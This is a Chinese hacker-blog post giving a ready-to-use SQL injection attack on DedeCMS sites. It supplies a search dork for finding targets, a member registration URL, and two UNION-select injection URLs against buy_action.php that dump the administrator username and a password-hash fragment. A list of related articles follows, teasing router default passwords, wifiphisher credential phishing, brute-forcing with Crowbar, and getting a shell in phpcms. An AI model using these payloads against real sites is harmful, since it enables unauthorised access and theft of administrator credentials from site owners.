dedecms注入爆管理员用户密码 ***

hacker5年前黑客文章998

关键词:powered by dedecms

首先注册个用户,注册地址:
/member/index_do.php?fmdo=user&dopost=regnew

爆管理帐号:
/member/buy_action.php?product=member&pid=1%20and%201=11%20union

%20select%201,2,userid,4,5%20from%20%23@__admin/*

爆管理员密码
/member/buy_action.php?product=member&pid=1%20and%201=11%20union%20

select%201,2,substring(pwd,9,16),4,5%20from%20%23@__admin/*

标签: 黑客技术

相关文章

最近路由器密码泄漏事件非常多,公布一组各类路由器默认账号密码,你是否中招?

特别友情提示:最近路由器密码泄漏事件非常多,公布一组各类路由器默认账号密码,你是否中招?亲赶紧改密码吧!! 品牌:ViKing 用户名:adsl 密码:adsl1234 品牌:实达默认IP:...

wifiphisher专用工具完全免费使用方法

wifiphisher专用工具完全免费使用方法

什么叫Wifiphisher? Wifiphisher是一种WiFi黑客工具,能够对无线网络/ WiFi互联网实行迅速的全自动互联网中间人攻击,目地是发觉客户和登陆密码凭证。   与无线网...

PasswordSafe的典型性主要用途是啥?

PasswordSafe的典型性主要用途是啥?

什么叫Password Safe? Password Safe是一个开源系统的登陆密码数据库工具。客户能够根据应用或键入单独“主密匙”来信息保密登陆密码并将其开启。   Password...

Crowbar是完全免费的吗?

Crowbar是完全免费的吗?

什么叫Crowbar? Crowbar是怪力进攻专用工具之一,为您出示了一个机遇来操纵递交给Web服务端的內容。它不容易试着明确一个积极主动的答复,如打恰当的登录名或登陆密码组成,只是告诉你出示“标...

记一次phpcms v9后台拿shell过程

记一次phpcms v9后台拿shell过程

记一次phpcms v9后台拿shell过程 登录进入后台管理后,点击界面,模板风格,然后点击祥细列表,如下图: 然后点击 search 这个文件夹,如下图: 然...

一张搜集二级域名的思维脑图

一张搜集二级域名的思维脑图

网络黑客的渗入方式,实际上压根来自安全性的木桶原理。 决策一个公司的网络信息安全,在于安全性结构加固最少的那片木工板。 网络黑客通常会对企业安全生产里最少的那片木工板着手。 网络黑客在渗入的情况下,...